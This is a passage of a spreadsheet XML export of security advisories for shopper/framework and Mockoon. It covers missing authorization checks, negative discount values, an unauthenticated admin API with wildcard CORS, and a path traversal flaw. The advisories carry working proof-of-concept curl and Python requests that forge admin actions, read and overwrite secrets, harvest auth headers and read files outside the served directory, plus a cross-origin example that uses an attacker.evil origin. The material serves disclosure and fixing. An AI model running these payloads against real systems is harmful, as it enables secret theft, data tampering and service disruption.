- `packages/admin/src/Livewire/Components/Products/VariantStock.php:34-91`
```php
// Line 34 - unprotected, client-mutable variant binding
public $variant;
// Lines 36-91 - no -&gt;authorize(...) on the Action
public function stockAction(): Action
{
    return Action::make('stock')
        -&gt;label(__('shopper::forms.actions.update'))
        -&gt;color('gray')
        -&gt;icon(Untitledui::Package)
        -&gt;modalHeading(__('shopper::pages/products.modals.variants.title'))
        -&gt;modalWidth(Width::Large)
        -&gt;schema([
            Select::make('inventory')
                -&gt;label(__('shopper::pages/products.inventory_name'))
                -&gt;options(Inventory::query()-&gt;pluck('name', 'id'))
                -&gt;native(false)
                -&gt;required(),
            TextInput::make('quantity')
                -&gt;label(__('shopper::forms.label.quantity'))
                -&gt;placeholder('-10 or -5 or 50, etc')
                -&gt;numeric()
                -&gt;required(),
        ])
        -&gt;action(function (array $data): void {
            // ...calls $this-&gt;variant-&gt;mutateStock(...) or decreaseStock(...)
            // with no permission check anywhere in this path
        });
}
```
## Steps to reproduce
Prerequisites: an admin-panel account with any role (including a role that holds only `browse_products` or `browse_orders`). No `edit_product_variants` permission is required.
```bash
# Step 1: Log in and obtain a session cookie and Livewire CSRF token.
# Obtain them from a normal browser login, then use them below.
SESSION="laravel_session=&lt;your_session_value&gt;"
XSRF="X-XSRF-TOKEN: &lt;url-decoded-value-of-XSRF-TOKEN-cookie&gt;"
# Step 2: Load the product variant page for any variant ID (e.g., 1).
# Capture the Livewire snapshot from the page source.
# Step 3: Call the stock action on an arbitrary variant.
# The wire payload sets "component.variant" to any variant ID in the database.
curl -s -X POST http://localhost/shopper/livewire/update \
  -H "Content-Type: application/json" \
  -H "$XSRF" \
  -H "Cookie: $SESSION" \
  -d '{
    "components": [{
      "snapshot": "{\"id\":\"VARIANT_STOCK_COMPONENT_ID\",\"data\":{\"variant\":42},\"checksum\":\"...\"}",
      "updates": {},
      "calls": [{"path":"","method":"callAction","params":["stock",{"inventory":1,"quantity":999}]}]
    }]
  }'
# Expected: HTTP 200, variant 42 stock increased by 999 regardless of caller permissions.
```
## Proof of concept
```python
#!/usr/bin/env python3
"""
VariantStock authorization bypass PoC.
Set these environment variables before running:
  BASE_URL        e.g. http://localhost
  SESSION_COOKIE  value of the laravel_session cookie
  XSRF_TOKEN      URL-decoded value of the XSRF-TOKEN cookie
  COMPONENT_ID    Livewire component snapshot ID (from page source)
  VARIANT_ID      integer ID of any target variant
  INVENTORY_ID    integer ID of the target inventory location
  QUANTITY        integer quantity adjustment (positive or negative)
"""
import json
import os
import requests
base_url      = os.environ['BASE_URL']
session       = os.environ['SESSION_COOKIE']
xsrf          = os.environ['XSRF_TOKEN']
component_id  = os.environ['COMPONENT_ID']
variant_id    = int(os.environ['VARIANT_ID'])
inventory_id  = int(os.environ['INVENTORY_ID'])
quantity      = int(os.environ['QUANTITY'])
headers = {
    'Content-Type': 'application/json',
    'Accept': 'text/html, application/xhtml+xml',
    'X-XSRF-TOKEN': xsrf,
    'Cookie': f'laravel_session={session}',
    'X-Livewire': '1',
}
snapshot = json.dumps({
    'id': component_id,
    'data': {'variant': variant_id},
    'checksum': 'UNLOCKED_PROP_NO_CHECKSUM_NEEDED',
})
payload = {
    'components': [{
        'snapshot': snapshot,
        'updates': {},
        'calls': [{
            'path': '',
            'method': 'callAction',
            'params': ['stock', {
                'inventory': inventory_id,
                'quantity': quantity,
            }]
        }]
    }]
}
r = requests.post(f'{base_url}/shopper/livewire/update', headers=headers, json=payload)
print(f'Status: {r.status_code}')
print(r.text[:500])
```
## Impact
Any authenticated admin panel user, regardless of role, can set the inventory quantity of any product variant to an arbitrary value. A browse-only staff member holding only `browse_products` can zero out stock for every variant (triggering out-of-stock states store-wide) or inflate stock counts to bypass stock-gating at checkout. Because `$variant` is not locked, the attacker is not limited to variants visible on their current page; they can target any variant by its integer ID.
## Suggested fix
```php
// packages/admin/src/Livewire/Components/Products/VariantStock.php
use Livewire\Attributes\Locked;
#[Locked]                     // prevent client-side ID substitution
public $variant;
public function stockAction(): Action
{
    return Action::make('stock')
        -&gt;authorize('edit_product_variants')   // add this
        // ... rest of the action
```
## Credits
Reported by Vishal Shukla ([@shukla304](https://github.com/shukla304) / [@therawdev](https://github.com/therawdev)).</t>
        </is>
      </c>
      <c r="S922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56829</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B923" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56830</t>
        </is>
      </c>
      <c r="D923" s="5" t="inlineStr"/>
      <c r="E923" s="5" t="inlineStr"/>
      <c r="F923" s="5" t="inlineStr"/>
      <c r="G923" s="5" t="inlineStr"/>
      <c r="H923" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I923" s="5" t="inlineStr"/>
      <c r="J923" s="5" t="inlineStr"/>
      <c r="K923" s="5" t="inlineStr"/>
      <c r="L923" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M923" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N923" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O923" s="5" t="inlineStr"/>
      <c r="P923" s="5" t="inlineStr"/>
      <c r="Q923" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R923" s="5" t="inlineStr">
        <is>
          <t>## Title
Missing authorization on Media sub-form store action allows unpermissioned product media update
## Description
A lack of authorization control on the `store()` method was found in `packages/admin/src/Livewire/Components/Products/Form/Media.php`. The security fix released for GHSA-h4mp-g9c6-xwph added `#[Locked]` to the `$product` property in this file but did not add an `authorize()` call to `store()`. The commit message for that fix (fcd0c59) explicitly names the five repaired sub-form components: Edit, Inventory, Seo, Shipping, Files. Media is absent from that list and absent from the published advisory. As a result, any authenticated admin-panel session, including a staff user holding only `browse_products`, can invoke `store()` on this component to replace the thumbnail and gallery images for any product without holding `edit_products`. Because `$product` is now `#[Locked]`, the attacker cannot redirect the write to an arbitrary product from the client side, but the permission gate is still absent, so the write succeeds against whichever product the component was initialized for.
## Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N  Score: 6.5  (Medium)
## Affected files
- `packages/admin/src/Livewire/Components/Products/Form/Media.php:64-76`
```php
// Lines 64-76 - store() with no authorize() call
public function store(): void
{
    $this-&gt;validate();
    $this-&gt;product-&gt;update($this-&gt;form-&gt;getState());  // overwrites thumbnail + gallery media
    $this-&gt;dispatch('product.updated');
    Notification::make()
        -&gt;body(__('shopper::pages/products.notifications.media_update'))
        -&gt;success()
        -&gt;send();
}
```
The five sibling components that were fixed in commit fcd0c59 each now have:
```php
public function store(): void
{
    $this-&gt;authorize('edit_products');  // present in Edit, Inventory, Seo, Shipping, Files
    // ...
}
```
`Media.store()` does not.
## Steps to reproduce
Prerequisites: an admin-panel account whose role holds `browse_products` but NOT `edit_products`.
```bash
SESSION="laravel_session=&lt;your_session_value&gt;"
XSRF="&lt;url-decoded-XSRF-TOKEN-cookie-value&gt;"
# Step 1: Load a product edit page as an admin to obtain the Media component's
#         Livewire snapshot ID and the product's public ID.
#         The component snapshot appears in the HTML source as data-livewire-snapshot.
# Step 2: As the low-privilege browse-only session, call store() on the Media component,
#         pointing at the captured component state.
curl -s -X POST http://localhost/shopper/livewire/update \
  -H "Content-Type: application/json" \
  -H "X-XSRF-TOKEN: $XSRF" \
  -H "Cookie: $SESSION" \
  -H "X-Livewire: 1" \
  -d '{
    "components": [{
      "snapshot": "&lt;snapshot JSON from page source with product locked&gt;",
      "updates": {},
      "calls": [{"path":"","method":"store","params":[]}]
    }]
  }'
# Expected: HTTP 200, product thumbnail and images updated without edit_products.
```
## Proof of concept
```python
#!/usr/bin/env python3
"""
Media component authorization bypass PoC.
Set these environment variables before running:
  BASE_URL        e.g. http://localhost
  SESSION_COOKIE  laravel_session cookie value (browse-only staff session)
  XSRF_TOKEN      URL-decoded XSRF-TOKEN cookie value
  SNAPSHOT_JSON   the full Livewire snapshot JSON string for the Media component
                  (copy from data-livewire-snapshot in the product edit page source)
The snapshot already contains the locked product ID, so no ID substitution is needed.
The bypass is purely the missing authorize() on store().
"""
import json
import os
import requests
base_url = os.environ['BASE_URL']
session  = os.environ['SESSION_COOKIE']
xsrf     = os.environ['XSRF_TOKEN']
snapshot = os.environ['SNAPSHOT_JSON']
headers = {
    'Content-Type': 'application/json',
    'Accept': 'text/html, application/xhtml+xml',
    'X-XSRF-TOKEN': xsrf,
    'Cookie': f'laravel_session={session}',
    'X-Livewire': '1',
}
payload = {
    'components': [{
        'snapshot': snapshot,
        'updates': {},
        'calls': [{'path': '', 'method': 'store', 'params': []}]
    }]
}
r = requests.post(f'{base_url}/shopper/livewire/update', headers=headers, json=payload)
print(f'Status: {r.status_code}')
print(r.text[:500])
```
## Impact
A staff member with only `browse_products` can update the thumbnail and product image gallery for any product. On a storefront, this means replacing product images with adversarial content (defaced images, misleading product photos) without leaving an edit trail that an admin watching the product edit history would normally associate with a permission-holding editor. The impact is limited to the products whose edit pages the attacker has visited in their browser session (the product ID is locked server-side), but that covers every product the browse-only user has ever loaded.
## Suggested fix
```php
// packages/admin/src/Livewire/Components/Products/Form/Media.php
public function store(): void
{
    $this-&gt;authorize('edit_products');  // add this line
    $this-&gt;validate();
    $this-&gt;product-&gt;update($this-&gt;form-&gt;getState());
    $this-&gt;dispatch('product.updated');
    Notification::make()
        -&gt;body(__('shopper::pages/products.notifications.media_update'))
        -&gt;success()
        -&gt;send();
}
```
## Credits
Reported by Vishal Shukla ([@shukla304](https://github.com/shukla304) / [@therawdev](https://github.com/therawdev)).</t>
        </is>
      </c>
      <c r="S923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56830</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B924" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56831</t>
        </is>
      </c>
      <c r="D924" s="5" t="inlineStr"/>
      <c r="E924" s="5" t="inlineStr"/>
      <c r="F924" s="5" t="inlineStr"/>
      <c r="G924" s="5" t="inlineStr"/>
      <c r="H924" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I924" s="5" t="inlineStr"/>
      <c r="J924" s="5" t="inlineStr"/>
      <c r="K924" s="5" t="inlineStr"/>
      <c r="L924" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M924" s="5" t="inlineStr">
        <is>
          <t>2.9.0</t>
        </is>
      </c>
      <c r="N924" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O924" s="5" t="inlineStr"/>
      <c r="P924" s="5" t="inlineStr"/>
      <c r="Q924" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R924" s="5" t="inlineStr">
        <is>
          <t>## Summary
The Shopper Framework discount management functionality accepts negative discount values without server-side validation.
It was confirmed that negative fixed-amount discounts can be created through the administrative interface, persisted to the database, and subsequently processed by the cart/order calculation pipeline.
The application appears to assume that discount values are always positive but does not enforce this assumption during creation, storage, or calculation.
As a result, malformed discount records can influence financial calculations and produce unintended order totals.
---
## Affected Product
**Package:** shopper/framework
**Version Tested:** 2.8.1
---
## Vulnerability Type
* Business Logic Vulnerability
* Improper Input Validation (CWE-20)
---
## Description
While reviewing the discount functionality, it was discovered that the application accepts negative discount values through the administrative interface.
Example values tested:
```text
-50.00
-99,999,999.00
```
The application accepted these values without validation and stored them in the database.
Example records observed in the `sh_discounts` table:
```text
1 | QCZ5Y3HESM | fixed_amount | -5000
4 | TOZKAHCB4S | fixed_amount | -9999999900
```
This demonstrates that negative discount values are successfully persisted.
---
## Steps to Reproduce
### 1. Create a Discount
Login as an administrator.
Navigate to:
```text
/cpanel/discounts
```
Create a new discount with the following values:
```text
Type: fixed_amount
Value: -99999999
```
Save the discount.
### 2. Observe Successful Creation
The discount is accepted by the application and displayed in the administration interface.
Example:
```text
Code: TOZKAHCB4S
Amount: -$99,999,999.00
```
### 3. Verify Database Persistence
Inspect the database:
```sql
select * from sh_discounts;
```
Observed entry:
```text
TOZKAHCB4S | fixed_amount | -9999999900
```
---
## Technical Analysis
### Discount Calculation
File:
```text
vendor/shopper/cart/src/Discounts/DiscountCalculator.php
```
Observed code:
```php
$fixedAmount = $discount-&gt;value;
```
The value is later processed without validation:
```php
$fixedAmount = min($fixedAmount, $applicableSubtotal);
```
When a negative value is supplied:
```php
min(-9999999900, 10000)
```
returns:
```php
-9999999900
```
allowing the negative value to continue through the calculation pipeline.
The resulting adjustment values are inserted into the database:
```php
CartLineAdjustment::query()-&gt;insert($adjustments);
```
No validation was identified to ensure that discount amounts are positive before calculations occur.
---
### Final Total Calculation
File:
```text
vendor/shopper/cart/src/Pipelines/Calculate.php
```
Observed logic:
```php
$context-&gt;total = max(
    0,
    $context-&gt;taxInclusive
        ? $context-&gt;subtotal - $context-&gt;discountTotal
        : $context-&gt;subtotal - $context-&gt;discountTotal + $context-&gt;taxTotal
);
```
Because negative discount values are allowed to reach this stage, financial calculations are performed using malformed discount data.
Example:
```text
Subtotal      = 10000
DiscountTotal = -5000
```
Resulting calculation:
```text
10000 - (-5000)
```
Result:
```text
15000
```
This demonstrates that negative discount values directly affect order total calculations.
---
## Impact
The following was confirmed:
* Negative discount values are accepted.
* Negative discount values are persisted.
* Negative discount values are processed by the discount calculation engine.
* Negative discount values affect order total calculations.
Potential consequences include:
* Incorrect pricing calculations.
* Financial data integrity issues.
* Unexpected order totals.
* Violated assumptions within downstream pricing logic.
* Future vulnerabilities if additional components assume discount values are always positive.
Because Shopper is a headless e-commerce administration framework and does not ship with a customer-facing storefront, it was not verified a customer-facing exploitation path.
However, malformed discount records currently propagate through pricing calculations without validation.
---
## Recommendation
Implement server-side validation enforcing positive discount values before persistence and before entering the calculation pipeline.
Suggested validation:
### Fixed Amount Discounts
```text
value &gt; 0
```
### Percentage Discounts
```text
0 &lt; value &lt;= 100
```
Additionally, existing discount records should be validated before calculation to prevent malformed data from influencing pricing logic.
---
## Environment
```text
Shopper Framework 2.8.1
Laravel 12.61.1
PHP 8.4.16
SQLite
```</t>
        </is>
      </c>
      <c r="S924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56831</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B925" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59148</t>
        </is>
      </c>
      <c r="D925" s="5" t="inlineStr"/>
      <c r="E925" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F925" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G925" s="5" t="inlineStr"/>
      <c r="H925" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I925" s="5" t="inlineStr"/>
      <c r="J925" s="5" t="inlineStr"/>
      <c r="K925" s="5" t="inlineStr"/>
      <c r="L925" s="5" t="inlineStr">
        <is>
          <t>npm:@mockoon/cli, npm:@mockoon/commons-server</t>
        </is>
      </c>
      <c r="M925" s="5" t="inlineStr">
        <is>
          <t>9.7.0</t>
        </is>
      </c>
      <c r="N925" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O925" s="5" t="inlineStr"/>
      <c r="P925" s="5" t="inlineStr"/>
      <c r="Q925" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-352, CWE-732, CWE-942</t>
        </is>
      </c>
      <c r="R925" s="5" t="inlineStr">
        <is>
          <t>## Summary
Mockoon's admin API ([`commons-server/src/libs/server/admin-api.ts`](https://github.com/mockoon/mockoon/blob/4375a8f/packages/commons-server/src/libs/server/admin-api.ts)) is mounted on the same Express listener as the user-defined mock routes, **enabled by default** in every shipped runtime (commons-server, CLI, serverless), serves **`Access-Control-Allow-Origin: *` on every endpoint with all HTTP methods allowed including PUT/POST/PATCH/DELETE/PURGE and `Content-Type` in `Access-Control-Allow-Headers`**, and has **zero authentication of any kind** (no token, no shared secret, no `MOCKOON_ADMIN_TOKEN` env var — searched the repo, returns zero hits).
Any unauthenticated caller who can reach the mock server's port (default `0.0.0.0:3000`) can:
- Read every `MOCKOON_*` env var used by the operator as secret material in templates (`getEnvVar` helper).
- **Write arbitrary process env vars (no prefix check on the WRITE path)** — poison operator's `MOCKOON_API_KEY`, `MOCKOON_JWT_SECRET`, …, or write process-level vars like `AWS_SECRET_ACCESS_KEY` that the surrounding runtime consumes.
- **Rewrite every mock route's body / status / headers in-runtime** via `PUT /mockoon-admin/environment` — downstream consumers (frontend dev-server, CI test suite, integration partner) receive attacker-controlled responses and headers including `Set-Cookie`, `Location`, `Content-Security-Policy`, etc.
- Read transaction logs / SSE stream (consumer's request bodies + auth headers in clear).
- Read/write global template vars; purge state / data buckets / logs.
Because of the wildcard CORS reply, the attack **also lands cross-origin from a browser**: a developer who runs `mockoon-cli start ...` locally and visits a malicious website gets their mock state hijacked.
---
## Details
### Root cause
`packages/commons-server/src/libs/server/server.ts:127`:
```ts
private options: ServerOptions = {
  ...,
  enableAdminApi: true,        // ← default on
};
```
`packages/cli/src/commands/start.ts:200`:
```ts
enableAdminApi: !userFlags['disable-admin-api'],   // default true unless --disable-admin-api passed
```
`packages/serverless/src/libs/serverless.ts:21`:
```ts
enableAdminApi: true,          // ← default on, no flag to disable in the constructor
```
`packages/commons-server/src/libs/server/admin-api.ts:63-74` (permissive CORS on every admin endpoint):
```ts
app.use(`${adminApiPrefix}*`, (req, res, next) =&gt; {
  res.setHeaders(
    new Headers({
      'Access-Control-Allow-Origin': '*',
      'Access-Control-Allow-Methods':
        'GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS',
      'Access-Control-Allow-Headers':
        'Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With'
    })
  );
  next();
});
```
`packages/commons-server/src/libs/server/admin-api.ts:151-166` (no auth, no prefix check on WRITE):
```ts
const setEnvVarHandler = (req, res) =&gt; {
  try {
    const { key, value } = req.body;
    if (key !== undefined &amp;&amp; value !== undefined) {
      process.env[key] = value;                            // ← any process env, any value
      res.send({ message: `Environment variable '${key}' has been set to '${value}'` });
    } else {
      throw new Error('Key or value missing from request');
    }
  } catch (_error) {
    res.status(400).send({ message: 'Invalid request' });
  }
};
```
`packages/commons-server/src/libs/server/admin-api.ts:373-393` (the most impactful — runtime mock rewrite):
```ts
app.put(`${adminApiPrefix}/environment`, (req, res) =&gt; {
  try {
    const environment: Environment = EnvironmentSchema.validate(req.body).value;
    if (!environment) {
      res.status(400).send({ message: 'Invalid environment format' });
      return;
    }
    updateEnvironment(environment);                        // ← runtime mutation of every route response
    res.send({ message: 'Environment updated' });
  } catch (_error) {
    res.status(400).send({ message: 'Invalid environment format' });
  }
});
```
Default `hostname: ''` (`packages/commons/src/constants/environment-schema.constants.ts:33`) → Node binds `0.0.0.0`/`::` (confirmed via `lsof`). Migration #16 (`packages/commons/src/libs/migrations.ts:343`) also forces missing hostnames to `'0.0.0.0'`.
---
## PoC
### Live reproduction (2026-05-11, `@mockoon/cli@9.6.1`)
`npm install @mockoon/cli@9.6.1`. Minimal `env.json` with one route `GET /users/:id` whose response templates `{{getEnvVar 'MOCKOON_API_KEY'}}`. Start with:
```
MOCKOON_API_KEY="sk-operator-real-secret-DO_NOT_LEAK_xyz789" \
  mockoon-cli start --data env.json --port 3100 --repair --disable-log-to-file
```
Bind confirmed via `lsof`:
```
COMMAND  PID    USER  FD  TYPE  ...  NAME
node    39906  ...   14u  IPv6  ...  TCP *:3100 (LISTEN)    &lt;-- all interfaces
```
Baseline mock response:
```
$ curl -s http://127.0.0.1:3100/users/42
{"id":"42","name":"BENIGN_ALICE","role":"user","apiKey":"sk-operator-real-secret-DO_NOT_LEAK_xyz789"}
```
#### 1) Read operator secret unauth
```
$ curl -s -i http://127.0.0.1:3100/mockoon-admin/env-vars/API_KEY
HTTP/1.1 200 OK
access-control-allow-origin: *
{"key":"MOCKOON_API_KEY","value":"sk-operator-real-secret-DO_NOT_LEAK_xyz789"}
```
#### 2) Poison operator secret unauth → downstream consumer ingests attacker value
```
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Content-Type: application/json" \
    -d '{"key":"MOCKOON_API_KEY","value":"sk-POISONED-BY-ATTACKER"}'
{"message":"Environment variable 'MOCKOON_API_KEY' has been set to 'sk-POISONED-BY-ATTACKER'"}
$ curl -s http://127.0.0.1:3100/users/42
{"id":"42","name":"BENIGN_ALICE","role":"user","apiKey":"sk-POISONED-BY-ATTACKER"}
```
#### 3) Write arbitrary non-`MOCKOON_*` env var (no prefix gate)
```
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Content-Type: application/json" \
    -d '{"key":"AWS_SECRET_ACCESS_KEY","value":"overwritten-by-attacker"}'
{"message":"Environment variable 'AWS_SECRET_ACCESS_KEY' has been set to 'overwritten-by-attacker'"}
```
#### 4) Cross-origin CSRF from `https://attacker.evil`
```
$ curl -s -i -X OPTIONS http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Origin: https://attacker.evil" \
    -H "Access-Control-Request-Method: POST" \
    -H "Access-Control-Request-Headers: Content-Type"
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS
Access-Control-Allow-Headers: Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Origin: https://attacker.evil" \
    -H "Content-Type: application/json" \
    -d '{"key":"MOCKOON_API_KEY","value":"sk-EXFIL-FROM-attacker.evil"}'
{"message":"Environment variable 'MOCKOON_API_KEY' has been set to 'sk-EXFIL-FROM-attacker.evil'"}
```
Wildcard `Access-Control-Allow-Origin: *` + `Access-Control-Allow-Methods` covering PUT/POST/PATCH + `Content-Type` in `Access-Control-Allow-Headers` mean the browser preflight passes for non-simple JSON POSTs. A developer who visits a malicious site while their Mockoon CLI is running is fully exploitable from JavaScript.
#### 5) Rewrite every mock route via unauth `PUT /environment`
```
$ curl -s -X PUT http://127.0.0.1:3100/mockoon-admin/environment \
    -H "Origin: https://attacker.evil" \
    -H "Content-Type: application/json" \
    -d '{ ...full env JSON with route response rewritten to body "ATTACKER_PWNED",
          statusCode 418, header X-Pwned: by-attacker.evil... }'
{"message":"Environment updated"}
$ curl -s -i http://127.0.0.1:3100/users/99
HTTP/1.1 418 I'm a Teapot
X-Pwned: by-attacker.evil
Content-Type: application/json
{"id":"99","name":"ATTACKER_PWNED","role":"admin","backdoor":true}
```
#### 6) Read transaction logs / SSE stream → harvest consumer's auth headers
```
$ curl -s http://127.0.0.1:3100/mockoon-admin/logs?limit=2
```
Each log entry includes consumer's `request.headers` (Authorization / Cookie / X-API-Key), `request.body`, `request.urlPath`, and the response served back — continuous info-disclosure of every API call the legitimate consumer makes against the mock. `GET /mockoon-admin/events` streams the same data live via SSE.
#### 7) Purge state (DoS)
```
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/state/purge
{"response":"Server has been reset to its initial state"}
```
---
## Impact
In typical local-dev mode (CVSS 8.8 High):
- Secret read of every `MOCKOON_*` env var (API keys, JWT signing keys, OAuth client secrets).
- Secret write to any `process.env` key — poison operator's secrets, swap AWS/SDK creds.
- Runtime rewrite of every mock route's body / status / headers → downstream consumer ingests attacker-controlled data + headers (Set-Cookie, Location, CSP).
- Auth-token harvesting via transaction logs / SSE stream.
- State purge / DoS.
In network-exposed deployment (CVSS 9.4 Critical):
- All of the above without user interaction. The serverless wrapper hardcodes `enableAdminApi: true`; `mockoon/cli` Docker image inherits the same default and is commonly deployed in shared CI / staging environments.
---
## Suggested fix
1. Require explicit authentication on the admin API by default. Print an auto-generated bearer token on CLI startup (Jupyter-style), keyed off `MOCKOON_ADMIN_TOKEN` env var, compared with `crypto.timingSafeEqual`.
2. Stop sending `Access-Control-Allow-Origin: *` on admin endpoints. Default: no CORS at all (browser will block cross-origin reads). Operators who run a separate admin UI on another origin can opt-in with `--admin-api-origin`.
3. Bind the admin API to loopback by default, on a separate port or behind a remote-address check.
4. Add a prefix check on the `setEnvVarHandler` matching the prepend behavior on the GET handler — reject any `key` that doesn't start with `envVarsPrefix`.
5. Add `SECURITY.md` with disclosure instructions.
6. Ship `@mockoon/serverless` and `mockoon/cli` Docker image with `enableAdminApi: false` by default; opt-in via flag.</t>
        </is>
      </c>
      <c r="S925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59148</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B926" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59149</t>
        </is>
      </c>
      <c r="D926" s="5" t="inlineStr"/>
      <c r="E926" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F926" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G926" s="5" t="inlineStr"/>
      <c r="H926" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I926" s="5" t="inlineStr"/>
      <c r="J926" s="5" t="inlineStr"/>
      <c r="K926" s="5" t="inlineStr"/>
      <c r="L926" s="5" t="inlineStr">
        <is>
          <t>npm:@mockoon/cli, npm:@mockoon/commons-server</t>
        </is>
      </c>
      <c r="M926" s="5" t="inlineStr">
        <is>
          <t>9.7.0</t>
        </is>
      </c>
      <c r="N926" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O926" s="5" t="inlineStr"/>
      <c r="P926" s="5" t="inlineStr"/>
      <c r="Q926" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-23</t>
        </is>
      </c>
      <c r="R926" s="5" t="inlineStr">
        <is>
          <t>## Summary
A `FILE` response whose `filePath` embeds request data (e.g. `"/srv/public/{{queryParam 'name'}}"`, the documented way to let the client pick a file) is confined by `getSafeFilePath` with `resolvedPath.startsWith(staticBaseDir)`. That prefix test has no path-separator boundary, so a `../`-escaped path whose absolute form string-prefixes the base directory passes. An unauthenticated client reads files from sibling paths outside the served directory.
## Details
`packages/commons-server/src/libs/server/server.ts`, `getSafeFilePath` (line 2315). The static base is the text before the first `{{`, resolved to an absolute path; the parsed `filePath` is then bounded by a string-prefix check:
```ts
const staticBaseDir = staticBaseMatch ? resolve(staticBaseMatch[1]) : null;     // 2336
const parsedFilePath = TemplateParser({ ... request ... });                     // request-controlled
const resolvedPath = resolvePath(parsedFilePath);
if (isPathAbsolute) {
  if (!staticBaseDir || !resolvedPath.startsWith(staticBaseDir)) {              // 2355
    throw new Error(`Access to absolute path outside of the original static base directory (${resolvedPath})`);
  }
} else if (!resolvedPath.startsWith(this.options.environmentDirectory)) {       // 2362
  throw new Error(`Access to relative path outside of the environment base directory (${resolvedPath})`);
}
```
With `"/srv/public/{{queryParam 'name'}}"`, `staticBaseDir = /srv/public`. A request `name=../public_backup/.env` resolves to `/srv/public_backup/.env`, and `"/srv/public_backup/.env".startsWith("/srv/public")` is `true` → served. Any sibling whose absolute path begins with the string `/srv/public` is reachable; the relative branch (`:2362`) is the same against `environmentDirectory`. A correct check appends `sep` to the base, or rejects when `relative(base, resolvedPath)` starts with `..`.
`filePath` is request-controlled (`queryParam`/`urlParam`/header/body via `TemplateParser`) for every `FILE` response: HTTP `sendFile` (`:1762`), WebSocket (`:1145`), callbacks (`:1586`).
## PoC
```sh
cat &gt; /tmp/poc.sh &lt;&lt;'POC'
set -e
mkdir -p /work/public /work/public_backup &amp;&amp; cd /work
echo 'public landing page' &gt; public/index.txt
echo 'AWS_SECRET_ACCESS_KEY=redacted' &gt; public_backup/.env
echo 'Michael, michael@example.com, 555-22-7741' &gt; public_backup/customers.csv
cat &gt; env.json &lt;&lt;'JSON'
{"uuid":"00000000-0000-0000-0000-000000000001","lastMigration":33,"name":"f","port":3000,"hostname":"","folders":[],
"routes":[{"uuid":"11111111-0000-0000-0000-000000000001","type":"http","documentation":"","method":"get","endpoint":"download",
"responses":[{"uuid":"22222222-0000-0000-0000-000000000001","body":"","latency":0,"statusCode":200,"label":"","headers":[],
"bodyType":"FILE","filePath":"/work/public/{{queryParam 'name'}}","sendFileAsBody":true,"rules":[],"rulesOperator":"OR",
"disableTemplating":false,"fallbackTo404":false,"default":true,"crudKey":"id","callbacks":[]}],
"responseMode":null,"streamingMode":null,"streamingInterval":0}],
"rootChildren":[{"type":"route","uuid":"11111111-0000-0000-0000-000000000001"}],
"proxyMode":false,"proxyHost":"","proxyRemovePrefix":false,
"tlsOptions":{"enabled":false,"type":"CERT","pfxPath":"","certPath":"","keyPath":"","caPath":"","passphrase":""},
